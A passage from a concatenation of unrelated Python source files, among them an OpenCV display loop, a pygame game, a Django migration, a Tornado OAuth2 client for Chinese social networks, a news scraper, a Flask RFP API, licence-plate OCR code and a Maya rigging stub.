TEXT_COLOR = (255, 255, 255) # white text
TEXT_FONT = cv2.FONT_HERSHEY_SIMPLEX
# Set up the text for display
cv2.rectangle(frame,(x1, y1), (x2, y1+20), LABEL_BG_COLOR, -1)
cv2.putText(frame, label + ': %.2f' % bbox.confidence, (x1+5, y1+15), TEXT_FONT, 0.5, TEXT_COLOR, 1)
# Set up the bounding box
cv2.rectangle(frame, (x1, y1), (x2, y2), BOX_COLOR, 1)
cv2.putText(frame, "NN fps: {:.2f}".format(fps), (2, frame.shape[0] - 4), cv2.FONT_HERSHEY_TRIPLEX, 0.4, TEXT_COLOR)
cv2.imshow("rgb", frame)
if cv2.waitKey(1) == ord('q'):
break
|
import os
import sys
import pygame as pg
from pygame.constants import DOUBLEBUF
from pygame.locals import *
import asset
import events
from config import SCREEN_HEIGHT, SCREEN_WIDTH
from game_screen.game_screen import GameScreen
from victory_screen.end_screen import EndScreen
from screen import Screen
from title_screen.title_screen import TitleScreen
pg.init()
pg.mouse.set_visible(False)
pg.mixer_music.load(os.path.join('assets', 'music.ogg'))
pg.mixer_music.play(-1)
pg.mixer_music.set_volume(1)
screen: pg.Surface = pg.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), FULLSCREEN)
events.init()
asset.init()
pg.display.set_caption("A loo in the dark!")
currentDisplayScreen: Screen = TitleScreen()
clock = pg.time.Clock()
while True:
for event in pg.event.get():
if event.type == QUIT or event.type == KEYDOWN and event.key == K_ESCAPE:
pg.quit()
sys.exit()
if (type(currentDisplayScreen) == TitleScreen or type(currentDisplayScreen) == EndScreen) \
and event.type == KEYDOWN and event.key == K_RETURN:
currentDisplayScreen = GameScreen()
if event.type == USEREVENT:
events.tick()
screen.fill((0, 0, 0))
screenChange = currentDisplayScreen.draw(screen, clock)
if screenChange:
currentDisplayScreen = screenChange()
pg.display.flip()
|
# Generated by Django 3.1 on 2020-08-17 16:51
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('polls', '0005_auto_20200817_1327'),
]
operations = [
migrations.AddField(
model_name='vote',
name='date',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='vote',
name='poll',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='polls.poll'),
preserve_default=False,
),
migrations.AlterField(
model_name='choice',
name='poll',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='choices', to='polls.poll'),
),
]
|
#!/usr/bin/env python3.6
# NOTE: requires python 3.6, you get a syntax error otherwise
from dataclasses import dataclass
from typing import List, Set
from dataclasses import field
@dataclass
class FluentArg:
name: str = None
type: str = None
@dataclass
class OperatorResource:
name: str
value: int
@dataclass
class DomainFluent:
name: str
args: List[FluentArg] = field(default_factory=list)
#resources:
@classmethod
def init_from_list(self, name, args):
df = self(name)
for arg in args:
df.args.append(FluentArg(arg[0], arg[1]))
return df
if __name__ == '__main__':
my_fluent = DomainFluent.init_from_list('RobotAt', [['Origin','Location'], ['Destination','Location']])
print('fluent name : {0}'.format(my_fluent.name))
print('fluent args : {0}'.format(my_fluent.args))
|
import sys
import sdl2
import sdl2.ext
from traits.api import Enum, HasTraits
from traitsui.api import Item, OKCancelButtons, View
# import other games here
from Games.air_hockey import AirHockeyGame
from Games.pong2 import PongGame
from Games.hello_world import HelloWorldGame
class GameInfo(HasTraits):
game_mode = Enum('Classic Pong', 'Hello World', 'Air Hockey')
num_players = Enum(1, 2)
difficulty = Enum('Easy', 'Medium', 'Pong Master')
view = View(Item(name='game_mode'),
Item(name='num_players'),
Item(name='difficulty',
enabled_when='num_players == 1'),
buttons = OKCancelButtons
)
# basically now in order to add a new game all we need to do is make a class
# for that game and make it have a run method that accepts game info. Actually
# the requirement is probably looser than that, it just needs to be importable
# and runable from inside this script
if __name__ == "__main__":
game_info = GameInfo()
game_info.configure_traits()
if game_info.game_mode == 'Classic Pong':
sys.exit(PongGame.run(game_info))
elif game_info.game_mode == 'Hello World':
sys.exit(HelloWorldGame.run(game_info))
elif game_info.game_mode == 'Air Hockey':
sys.exit(AirHockeyGame.run(game_info))
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from pants.engine.addresses import UnparsedAddressInputs
from pants.option.option_types import TargetListOption
from pants.option.subsystem import Subsystem
from pants.util.strutil import softwrap
class ScroogeJavaSubsystem(Subsystem):
options_scope = "java-scrooge"
help = "Java-specific options for the Scrooge Thrift IDL compiler (https://twitter.github.io/scrooge/)."
_runtime_dependencies = TargetListOption(
help=softwrap(
"""
A list of addresses to `jvm_artifact` targets for the runtime
dependencies needed for generated Java code to work. For example,
`['3rdparty/jvm:libthrift']`. These dependencies will
be automatically added to every `thrift_source` target. At the very least,
this option must be set to a `jvm_artifact` for the
`org.apache.thrift:libthrift` runtime library.
"""
),
)
@property
def runtime_dependencies(self) -> UnparsedAddressInputs:
return UnparsedAddressInputs(
self._runtime_dependencies,
owning_address=None,
description_of_origin=f"the option `[{self.options_scope}].runtime_dependencies`",
)
|
from setuptools import setup,find_packages
#generate install_requires from requirements.txt file
install_requires=open('requirements.txt','r').read().strip().split('\n')
print(f"install_requires:{install_requires}")
config = {
'name': 'chrombpnet',
'author_email': 'anusri @ stanford.edu',
'license': 'MIT',
'include_package_data': True,
'description': 'chrombpnet predicts chromatin accessibility from sequence',
'download_url': 'https://github.com/kundajelab/chrombpnet',
'version': '0.1.3',
'packages': find_packages(),
'python_requires': '>=3.8',
'install_requires': install_requires,
'zip_safe': False,
'scripts':[
'chrombpnet/training/models/bpnet_model.py',
'chrombpnet/training/models/chrombpnet_with_bias_model.py'
],
'entry_points': {'console_scripts': [
'chrombpnet = chrombpnet.CHROMBPNET:main',
'print_meme_motif_file = chrombpnet.data.__init__:print_meme_motif_file']}
}
if __name__== '__main__':
setup(**config)
|
#!/usr/bin/env python
# encoding: utf-8
"""
oauth2lib.py
Created by yang.zhou on 2012-10-06.
Copyright (c) 2012 zhouyang.me. All rights reserved.
"""
import logging
import requests
import json
from urllib import urlencode
from urlparse import parse_qs
from tornado.auth import OAuth2Mixin
from tornado.web import asynchronous
from tornado import httpclient
from tornado.httputil import HTTPHeaders, url_concat
from tornado import escape
from tornado import gen
def repost_request_weibo(url, access_token, post_id,
post_status, is_comment, **kwargs):
header = {'Authorization': 'OAuth2 %s' % access_token}
url += "?" + urlencode({"access_token": access_token, "id": post_id})
response = requests.post(url, headers=header,
data={
"status": post_status,
"is_comment": is_comment
})
return response
def message_request(url, port, access_token, content, **kwargs):
header = {'Authorization': 'OAuth2 %s' % access_token}
if port == "weibo":
url += "?" + urlencode({"access_token": access_token})
response = requests.post(url, headers=header, data={"status": content})
if response.status_code == 200:
return response.content
elif port == "tencent":
body = {"access_token": access_token,
"oauth_consumer_key": kwargs["app_key"],
"openid": kwargs["openid"],
"client_ip": kwargs["client_ip"],
"oauth_version": "2.a",
"scope":"all",
"format": "json",
"content": content}
response = requests.post(url, headers=header, data=body)
if response.status_code == 200:
content = json.loads(response.content)
if content.get("errcode") == 0:
logging.info("tencent message_request success")
return content.get("data")
elif port == "douban":
header = {'Authorization': 'Bearer %s' %access_token}
body = {"access_token": access_token,
"source": kwargs["app_key"],
"text": content,
"attachment": kwargs["attachment"]}
response = requests.post(url, headers=header, data=body)
if response.status_code == 200:
logging.info(response.content)
else:
logging.info(response.content)
return None
class DoubanMixin(OAuth2Mixin):
_OAUTH_ACCESS_TOKEN_URL = "https://www.douban.com/service/auth2/token"
_OAUTH_AUTHORIZE_URL = "https://www.douban.com/service/auth2/auth"
_OAUTH_NO_CALLBACKS = False
_OAUTH_USER_INFO_URL = "https://api.douban.com/v2/user/~me"
_PORT = "douban"
def _on_get_user_info(self, callback, oauth2_info, user):
if user is None:
callback(None)
return
for k,v in user.items():
print "%s: %s" %(k, v)
user_info = {
"username": "%s#%s" %(user.get("name"), self._PORT),
"nickname": user.get("name"),
"gender": user.get("gender"),
"access_token": oauth2_info["access_token"],
"oauth_id": user.get("id"),
"port": self._PORT,
"oauth_info": {
"profile_image_url": user.get("avatar"),
"oauth2_expires": oauth2_info["expires_in"],
"description": user.get("desc").encode("utf-8"),
"location": user.get("loc_name"),
}
}
callback(user_info)
def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, callback):
http_client = httpclient.AsyncHTTPClient()
args = {
"redirect_uri": redirect_uri,
"code": code,
"client_id": client_id,
"client_secret": client_secret,
"extra_params": {"grant_type": "authorization_code"}
}
http_client.fetch(
self._oauth_request_token_url(**args),
self.async_callback(
self._on_access_token,
redirect_uri,
client_id,
client_secret,
callback
),
method="POST",
body=urlencode(args))
def _on_access_token(self, redirect_uri, client_id, client_secret, callback, response):
if response.error:
logging.error('Douban auth error: %s' % str(response))
callback(None)
return
response_dict = escape.json_decode(response.body)
oauth2_info = {
"access_token": response_dict["access_token"],
"expires_in": response_dict["expires_in"],
"douban_user_id": response_dict["douban_user_id"],
"refresh_token": response_dict["refresh_token"]
}
self.api_request(
url= self._OAUTH_USER_INFO_URL,
method="GET",
callback=self.async_callback(self._on_get_user_info, callback, oauth2_info),
access_token=oauth2_info["access_token"],
douban_user_id=oauth2_info["douban_user_id"]
)
def api_request(self, url, method, callback, access_token=None, expires_in=None, **args):
header = HTTPHeaders({'Authorization': 'Bearer %s' % access_token})
http_client = httpclient.AsyncHTTPClient()
callback = self.async_callback(self._on_api_request, callback)
print url
if method == "POST":
http_client.fetch(url, method=method, body=urlencode(args), callback=callback, headers=header)
else:
#url += "&" + urlencode(args)
http_client.fetch(url, callback=callback, headers=header)
def _on_api_request(self, callback, response):
if response.error:
logging.warning("Error response %s %s fetching %s", response.error,response.body,
response.request.url)
callback(None)
return
callback(escape.json_decode(response.body))
class WeiboMixin(OAuth2Mixin):
_OAUTH_ACCESS_TOKEN_URL = "https://api.weibo.com/oauth2/access_token"
_OAUTH_AUTHORIZE_URL = "https://api.weibo.com/oauth2/authorize"
_OAUTH_NO_CALLBACKS = False
_OAUTH_USER_INFO_URL = "https://api.weibo.com/2/users/show.json"
_PORT = "weibo"
def _on_get_user_info(self, callback, oauth2_info, user):
if user is None:
callback(None)
return
user_info = {
"username": "%s#%s" %(user.get("screen_name"), self._PORT),
"nickname": user.get("screen_name"),
"gender": user.get("gender"),
"access_token": oauth2_info["access_token"],
"oauth_id": oauth2_info["uid"],
"port": self._PORT,
"oauth_info": {
"description": user.get("description").encode("utf-8"),
"province": user.get("province"),
"city": user.get("city"),
"location": user.get("location"),
"profile_image_url": user.get("profile_image_url"),
"oauth2_expires": oauth2_info["expires_in"],
}
}
callback(user_info)
def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, extra_params, callback):
http_client = httpclient.AsyncHTTPClient()
args = {
"redirect_uri": redirect_uri,
"code": code,
"client_id": client_id,
"client_secret": client_secret,
"extra_params": extra_params
}
http_client.fetch(
self._oauth_request_token_url(**args),
self.async_callback(
self._on_access_token,
redirect_uri,
client_id,
client_secret,
callback),
method="POST",
body=urlencode(args))
def _on_access_token(self, redirect_uri, client_id, client_secret, callback, response):
if response.error:
logging.error('Weibo auth error: %s' % str(response))
callback(None)
return
response_dict = escape.json_decode(response.body)
oauth2_info = {
"access_token": response_dict["access_token"],
"expires_in": response_dict["expires_in"],
"uid": response_dict["uid"]
}
self.api_request(
url= self._OAUTH_USER_INFO_URL,
method="GET",
callback=self.async_callback(self._on_get_user_info, callback, oauth2_info),
access_token=oauth2_info["access_token"],
uid=oauth2_info["uid"]
)
def api_request(self, url, method, callback, access_token=None, expires_in=None, **args):
if access_token:
args.update(access_token=access_token)
header = HTTPHeaders({'Authorization': 'OAuth2 %s' % access_token})
http_client = httpclient.AsyncHTTPClient()
callback = self.async_callback(self._on_api_request, callback)
url += "?" + urlencode({"access_token": access_token})
if method == "POST":
http_client.fetch(url, method=method, body=urlencode(args), callback=callback, headers=header)
else:
url += "&" + urlencode(args)
http_client.fetch(url, callback=callback, headers=header)
def _on_api_request(self, callback, response):
if response.error:
logging.warning("Error response %s %s fetching %s", response.error,response.body,
response.request.url)
callback(None)
return
callback(escape.json_decode(response.body))
class TencentMixin(OAuth2Mixin):
_OAUTH_ACCESS_TOKEN_URL = "https://open.t.qq.com/cgi-bin/oauth2/access_token"
_OAUTH_AUTHORIZE_URL = "https://open.t.qq.com/cgi-bin/oauth2/authorize"
_OAUTH_NO_CALLBACKS = False
_OAUTH_USER_INFO_URL = "https://open.t.qq.com/api/user/info"
_PORT = "tencent"
def get_authenticated_user(self, redirect_uri, client_id, client_secret, code, openid, callback):
http_client = httpclient.AsyncHTTPClient()
args = {
"redirect_uri": redirect_uri,
"code": code,
"client_id": client_id,
"client_secret": client_secret,
}
url = self._oauth_request_token_url(**args)
args.update(grant_type="authorization_code")
http_client.fetch(url,
self.async_callback(
self._on_access_token,
redirect_uri,
client_id,
client_secret,
openid,
callback),
method="POST",
body=urlencode(args))
def _on_access_token(self, redirect_uri, client_id, client_secret, openid, callback, response):
if response.error:
logging.error('Weibo auth error: %s' % str(response))
callback(None)
return
response_dict = parse_qs(response.body)
oauth2_info = {
"client_id": client_id,
"access_token": response_dict["access_token"][0],
"expires_in": response_dict["expires_in"][0],
"openid": openid
}
self.api_request(
self._OAUTH_USER_INFO_URL,
"GET",
self.async_callback(self._on_get_user_info, callback, oauth2_info),
oauth2_info["access_token"],
oauth2_info["expires_in"],
openid=oauth2_info["openid"],
oauth_consumer_key=oauth2_info["client_id"],
oauth_version="2.a",
scope="all"
)
def api_request(self, url, method, callback, access_token=None, expires_in=None, **args):
if access_token:
args.update(access_token=access_token)
header = HTTPHeaders({'Authorization': 'OAuth2 %s' % access_token})
http_client = httpclient.AsyncHTTPClient()
callback = self.async_callback(self._on_api_request, callback)
url += "?" + urlencode({"access_token": access_token})
if method == "POST":
http_client.fetch(url, method=method, body=urlencode(args), callback=callback, headers=header)
else:
url += "&" + urlencode(args)
http_client.fetch(url, callback=callback, headers=header)
def _on_api_request(self, callback, response):
if response.error:
logging.warning("Error response %s %s fetching %s", response.error,response.body,
response.request.url)
callback(None)
return
callback(escape.json_decode(response.body))
def _on_get_user_info(self, callback, oauth2_info, user):
if user is None:
callback(None)
return
content = user["data"]
user_info = {
"username": "%s#%s" %(content["name"], self._PORT),
"nickname": content["nick"],
"access_token": oauth2_info["access_token"],
"oauth_id": oauth2_info["openid"],
"port": self._PORT,
"oauth_info": {
"description": content["introduction"].encode("utf-8"),
"location": content["location"],
"profile_image_url": "%s/50" %content["head"],
"oauth2_expires": oauth2_info["expires_in"],
}
}
callback(user_info)
|
import numpy as np
from scipy import interpolate
from scipy import fftpack
from scipy import signal
import math
import pdb
import matplotlib.pyplot as plt
class AScan:
def __init__(self,ref_spectrum,resample,imrange):
self.ref_spectrum = ref_spectrum
self.resampling_table = resample
self.range = imrange
def deconv_threshold(self,spectrum_val,ref_val):
if ref_val> 0.1:
return float(((spectrum_val + 1000.0) / (ref_val +1000.0)) - 1)
else:
return 0.0
def deconv_method(self,spectrum):
# method by which the source spectrum is deconvolved from IOCT signa;
deconv = [ self.deconv_threshold(spectrum[i],self.ref_spectrum[i]) for i in range(len(spectrum))]
nuttall = signal.blackman(1024)
windowed = [ (deconv[i] * nuttall[i]) for i in range(len(spectrum)) ]
deconv = windowed - np.mean(windowed)
np_deconv = np.array(deconv,dtype='float32')
return np_deconv
def a_scan(self, spectrum):
np_deconv = self.deconv_method(spectrum)
spline = interpolate.splrep(np.arange(0,1024), np_deconv, s=0)
xnew = np.array(self.resampling_table, dtype='float32')
self.deconv_interpolated_spectrum = np.float32(interpolate.splev(xnew,spline))
a_scan = self.correction_method()
#pdb.set_trace()
return a_scan
def range_envelope(self,spectrum):
positive_complex_freqs = fftpack.fft(spectrum)[1:512]
return np.abs(positive_complex_freqs)
def correction_method(self):
signal = self.range_envelope(self.deconv_interpolated_spectrum)
return signal |
import os
import json
class Pyson:
'''Allows for easier manipulation of json files.
It will check if a json file already exists with the given file name and open that, otherwise it will create a new one.
Default datatype is a DICT, but you can pass what you want to it. EX: example=Pyson(file_name,[]) would pass a list to the json.
To update the data, modify the json with using the "data" attribute. EX: example.data.append('test') would add 'test' to the list declared above.
Commit changes with the "save" attribute. EX: example.save would save the changes to the json file'''
def __init__(self, file_name, data={}):
if not file_name.endswith('.json'):
file_name = file_name + '.json'
if not os.path.isfile(file_name):
pass
else:
try:
with open(file_name) as f:
data = json.load(f)
except ValueError:
pass
self.file_name = file_name
self.data = data
@property
def save(self):
'''Save your json file'''
if not self.file_name.endswith('.json'):
self.file_name = self.file_name + '.json'
with open(self.file_name, "w") as f:
json.dump(self.data, f, indent=4, sort_keys=True)
|
from micompy.common.tools.bbmap import BBmap
from micompy.common.tools.checkm import CheckM
from micompy.common.tools.mash import MASH
from micompy.common.tools.hmmer import HMMer
from micompy.common.tools.tool import Tool
class WorkBench(object):
def __getitem__(self, key):
return self.tools.get(key)
def __init__(self):
self.tools = {}
def add_tool(self, tool, name = None):
assert isinstance(tool, Tool), tool + " is not a tool"
self.tools[name if name else tool.name] = tool
def default_bench(self):
self.add_tool(BBmap())
self.add_tool(CheckM())
self.add_tool(MASH())
self.add_tool(HMMer())
|
import requests
from pymongo import MongoClient
from selenium import webdriver
from bs4 import BeautifulSoup
import time
client = MongoClient('localhost', 27017)
db = client.dbsparta
# 내장 라이브러리이므로 설치할 필요가 없습니다.
# 셀레니움을 실행하는데 필요한 크롬드라이버 파일을 가져옵니다.
chrome_path = '/Users/apple/Desktop/sparta/projects/recycling/chromedriver'
driver = webdriver.Chrome(chrome_path)
# news 페이지 url을 입력합니다.
url = 'https://news.google.com/search?q=recycling&hl=en-US&gl=US&ceid=US%3Aen'
# 크롬을 통해 네이버 주식페이지에 접속합니다.
driver.get(url)
# 정보를 받아오기까지 2초를 잠시 기다립니다.
time.sleep(2)
def get_articles_google():
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get('https://news.google.com/search?q=recycling&hl=en-US&gl=US&ceid=US%3Aen', headers=headers)
soup = BeautifulSoup(data.text, 'html.parser')
uls = soup.select('#div.93789 > a.VDXfz')
urls = []
for ul in uls:
a = ul.select_one('article > a')
if a is not None:
url = a['href']
urls.append(url)
return urls
# 출처 url로부터 뉴스의 사진, 제목, 기사 정보를 가져오고 news 콜렉션에 저장합니다.
def insert_engarticles(url):
headers = {
'accept-charset': 'UTF-8',
'Content-Type': 'text/html; charset=utf-8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}
data = requests.get(url, headers=headers)
soup = BeautifulSoup(data.text, 'html.parser')
title = soup.select_one('meta[property="og:title"]')["content"]
image = soup.select_one('meta[property="og:image"]')["content"]
desc = soup.select_one('meta[property="og:description"]')["content"]
doc = {
'title': title,
'image': image,
'description': desc,
'isKor': False,
'url': url,
}
db.engarticles.insert_one(doc)
print('완료!', title)
# 크롬을 종료합니다.
urls = get_articles_google()
for url in urls:
insert_engarticles(url)
driver.quit() |
from flask import Blueprint, g
from sqlalchemy import or_
from grant.utils.enums import RFPStatus
from grant.utils.auth import requires_auth
from grant.parser import body
from .models import RFP, rfp_schema, rfps_schema, db
from marshmallow import fields
blueprint = Blueprint("rfp", __name__, url_prefix="/api/v1/rfps")
@blueprint.route("/", methods=["GET"])
def get_rfps():
rfps = RFP.query \
.filter(or_(
RFP.status == RFPStatus.LIVE,
RFP.status == RFPStatus.CLOSED,
)) \
.order_by(RFP.date_created.desc()) \
.all()
return rfps_schema.dump(rfps)
@blueprint.route("/<rfp_id>", methods=["GET"])
def get_rfp(rfp_id):
rfp = RFP.query.filter_by(id=rfp_id).first()
if not rfp or rfp.status == RFPStatus.DRAFT:
return {"message": "No RFP with that ID"}, 404
return rfp_schema.dump(rfp)
@blueprint.route("/<rfp_id>/like", methods=["PUT"])
@requires_auth
@body({"isLiked": fields.Bool(required=True)})
def like_rfp(rfp_id, is_liked):
user = g.current_user
# Make sure rfp exists
rfp = RFP.query.filter_by(id=rfp_id).first()
if not rfp:
return {"message": "No RFP matching id"}, 404
if not rfp.status == RFPStatus.LIVE:
return {"message": "RFP is not live"}, 404
rfp.like(user, is_liked)
db.session.commit()
return {"message": "ok"}, 200
|
# Copyright 2023 Pulser Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines weight maps on top of traps."""
from __future__ import annotations
from dataclasses import dataclass
from typing import Optional, cast
import matplotlib.pyplot as plt
import numpy as np
from matplotlib.axes import Axes
from numpy.typing import ArrayLike
from pulser.register._reg_drawer import RegDrawer
@dataclass
class WeightMap(RegDrawer):
"""Defines a generic map of weights on traps.
The sum of the provided weights must be equal to 1.
Args:
trap_coordinates: An array containing the coordinates of the traps.
weights: A list weights to associate to the traps.
"""
trap_coordinates: ArrayLike
weights: list[float]
def __post_init__(self) -> None:
if len(cast(list, self.trap_coordinates)) != len(self.weights):
raise ValueError("Number of traps and weights don't match.")
if not np.all(np.array(self.weights) >= 0):
raise ValueError("All weights must be non-negative.")
if not np.isclose(sum(self.weights), 1.0, atol=1e-16):
raise ValueError("The sum of the weights should be 1.")
def draw(
self,
with_labels: bool = True,
fig_name: str | None = None,
kwargs_savefig: dict = {},
custom_ax: Optional[Axes] = None,
show: bool = True,
) -> None:
"""Draws the detuning map.
Args:
with_labels: If True, writes the qubit ID's
next to each qubit.
fig_name: The name on which to save the figure.
If None the figure will not be saved.
kwargs_savefig: Keywords arguments for
``matplotlib.pyplot.savefig``. Not applicable if `fig_name`
is ``None``.
custom_ax: If present, instead of creating its own Axes object,
the function will use the provided one. Warning: if fig_name
is set, it may save content beyond what is drawn in this
function.
show: Whether or not to call `plt.show()` before returning. When
combining this plot with other ones in a single figure, one may
need to set this flag to False.
"""
pos = np.array(self.trap_coordinates)
if custom_ax is None:
_, custom_ax = self._initialize_fig_axes(pos)
super()._draw_2D(
custom_ax,
pos,
[i for i, _ in enumerate(cast(list, self.trap_coordinates))],
with_labels=with_labels,
dmm_qubits=dict(enumerate(self.weights)),
)
if fig_name is not None:
plt.savefig(fig_name, **kwargs_savefig)
if show:
plt.show()
@dataclass
class DetuningMap(WeightMap):
"""Defines a DetuningMap.
A DetuningMap associates a detuning weight to the coordinates of a trap.
The sum of the provided weights must be equal to 1.
Args:
trap_coordinates: an array containing the coordinates of the traps.
weights: A list of detuning weights to associate to the traps.
"""
|
import cv2
import numpy as np
import Detect_lines as dec
import Segmentation as s
import os
# ============================================================================
def reduce_colors(img, n):
Z = img.reshape((-1, 3))
# convert to np.float32
Z = np.float32(Z)
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = n
ret, label, center = cv2.kmeans(Z, K, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
return res2
# ============================================================================
def clean_image(img):
gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# resized_img = cv2.resize(gray_img
# , None
# , fx=5.0
# , fy=5.0
# , interpolation=cv2.INTER_CUBIC)
# resized_img = cv2.GaussianBlur(resized_img, (5, 5), 0)
# cv2.imwrite('licence_plate_large.png', resized_img)
#
# equalized_img = cv2.equalizeHist(resized_img)
# cv2.imwrite('licence_plate_equ.png', equalized_img)
# reduced = cv2.cvtColor(reduce_colors(cv2.cvtColor(equalized_img, cv2.COLOR_GRAY2BGR), 8), cv2.COLOR_BGR2GRAY)
# cv2.imwrite('licence_plate_red.png', reduced)
# ret, mask = cv2.threshold(gray_img, 127, 255, 0)
# cv2.imwrite('licence_plate_mask.png', mask)
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
mask = cv2.erode(gray_img, kernel, iterations=1)
cv2.imwrite('licence_plate_mask2.png', mask)
return mask
# ============================================================================
def extract_characters(img):
# bw_image = cv2.bitwise_not(img)
contours = cv2.findContours(img, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)[1]
height = np.size(img, 0)
width = np.size(img, 1)
h_coef_min = 12
h_coef_max = 90
w_coef_min = 10
w_coef_max = 90
h_max = height * h_coef_max / 100
h_min = height * h_coef_min / 100
w_max = width * w_coef_max / 100
w_min = width * w_coef_min / 100
char_mask = np.zeros_like(img)
contours = sorted(contours, key=cv2.contourArea, reverse=True)[:20]
bounding_boxes = []
for c in contours:
peri = cv2.arcLength(c, True)
ap = cv2.approxPolyDP(c, 0.02 * peri, True)
oh = s.max_min(ap)
point1, point2 = s.max_min(ap)
t = s.take_character((h_min, h_max), (w_min, w_max), point1, point2)
if t:
bounding_boxes.append(oh)
cv2.rectangle(char_mask, point1, point2, 255, -1)
bounding_boxes.sort()
ter = s.delete_crosses(bounding_boxes)
for point1, point2 in ter:
cv2.rectangle(char_mask , point1, point2, 255, 1)
characters = []
for point1, point2 in ter:
x, y, = point1
w, h = point2
char_image = dec.roi_area(img,point1, point2)
# dec.open_picture(char_image,'t')
characters.append(((point1, point2), char_image))
return characters
def highlight_characters(img, chars):
output_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
for bbox, char_img in chars:
point1, point2 = bbox
cv2.rectangle(output_img, point1, point2, 255, 1)
return output_img
def model_knn(samples,responses):
samples = np.loadtxt(samples, np.float32)
# print(samples)
responses = np.loadtxt(responses, np.float32)
# print(len(responses))
# print(responses.size)
responses = responses.reshape((responses.size, 1))
# print(responses)
model = cv2.ml.KNearest_create()
model.train(samples, cv2.ml.ROW_SAMPLE, responses)
return model
# ============================================================================os.listdir(r'D:\Github_project\VKR\ROI_PICTURE') ['106.png']
dir = ['353.png']
charss = model_knn(r'D:\Github_project\OPENCV_Examples\OPENCV\Test\chars_samples.data',r'D:\Github_project\OPENCV_Examples\OPENCV\Test\chars_responses.data')
digits = model_knn(r'D:\Github_project\OPENCV_Examples\OPENCV\Test\digits_samples.data',r'D:\Github_project\OPENCV_Examples\OPENCV\Test\digits_responses.data')
for j in dir:
img = cv2.imread(r'D:\Github_project\VKR\ROI_PICTURE\{0}'.format(j))
img = clean_image(img)
chars = extract_characters(img)
# output_img = highlight_characters(clean_img, chars)
# cv2.imwrite('licence_plate_out.png', output_img)
# samples = np.loadtxt(r'D:\Github_project\OPENCV\Test\chars_samples.data', np.float32)
# # print(samples)
# responses = np.loadtxt(r'D:\Github_project\OPENCV\Test\chars_responses.data', np.float32)
# # print(len(responses))
# # print(responses.size)
# responses = responses.reshape((responses.size, 1))
# # print(responses)
# model = cv2.ml.KNearest_create()
#
# model.train(samples, cv2.ml.ROW_SAMPLE, responses)
# charss = model_knn(r'D:\Github_project\OPENCV\Test\chars_samples.data',r'D:\Github_project\OPENCV\Test\chars_responses.data')
i = 1
plate_chars = ""
digits_chars = ''
for bbox, char_img in chars:
# print(char_img.size)
small_img = cv2.resize(char_img, (100,120))
# dec.open_picture(small_img)
small_img = small_img.reshape((1, 12000))
small_img = np.float32(small_img)
retval, results, neigh_resp, dists = digits.findNearest(small_img, k=1)
print(str(chr(results)))
# digits_chars += str(chr((results[0][0])))
retval, results, neigh_resp, dists = charss.findNearest(small_img, k=1)
# print(str(chr(results)))
# plate_chars += str(chr((results[0][0])))
# # retval, results, neigh_resp, dists = digits.findNearest(small_img, k=1)
# # plate_chars += str(chr((results[0][0])))
# if i < 2 and i >= 1:
# retval, results, neigh_resp, dists = charss.findNearest(small_img, k=1)
# plate_chars += str(chr((results[0][0])))
# if i >= 2 and i < 5:
# retval, results, neigh_resp, dists = digits.findNearest(small_img, k=1)
# plate_chars += str(chr((results[0][0])))
# if i > 5 and i < 7:
# retval, results, neigh_resp, dists = charss.findNearest(small_img, k=1)
# plate_chars += str(chr((results[0][0])))
# if i > 7:
# retval, results, neigh_resp, dists = digits.findNearest(small_img, k=1)
# plate_chars += str(chr((results[0][0])))
# i+= 1
# print("Digits: %s" % digits_chars)
# print("Chars: %s" % plate_chars)
# print(plate_chars[0]+digits_chars[1:4] + plate_chars[4:6]+digits_chars[6:])
# output = highlight_characters(img,chars)
# dec.open_picture(output,j)
|
x = int(input())
y = int(input())
day = 1
while x < y:
x += x * 0.1 # ежедневное увеличение дистанции на 10%
day += 1
print(day)
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
""" File contain all Tonga decorator
"""
from functools import wraps
from typing import Any, Callable
from tonga.stores.manager.errors import UninitializedStore
__all__ = [
'check_initialized'
]
def check_initialized(func: Callable) -> Any:
""" Check decorator, check is store is initialized
Args:
func (Callable): Function to wraps
Raises:
UninitializedStore: Raised when store is not initialized
Returns:
Any: Return func result
"""
@wraps(func)
async def wrapper(*args, **kwargs):
if args[0].is_initialized():
response = await func(*args, **kwargs)
return response
raise UninitializedStore('Uninitialized store', 500)
return wrapper
|
"""
defaultRig deformation setup
"""
import maya.cmds as mc
import maya.mel as mm
import glob
from rigTools import bSkinSaver
from . import project
from rigLib.utils import name
def build(baseRig, characterName):
#load skin weights
modelGrp = '%s_model_grp'%characterName
geoList = _getModelGeoObjects(modelGrp)
# loadSkinWeights(characterName, geoList)
if project.mush:
#apply delta mush deformer
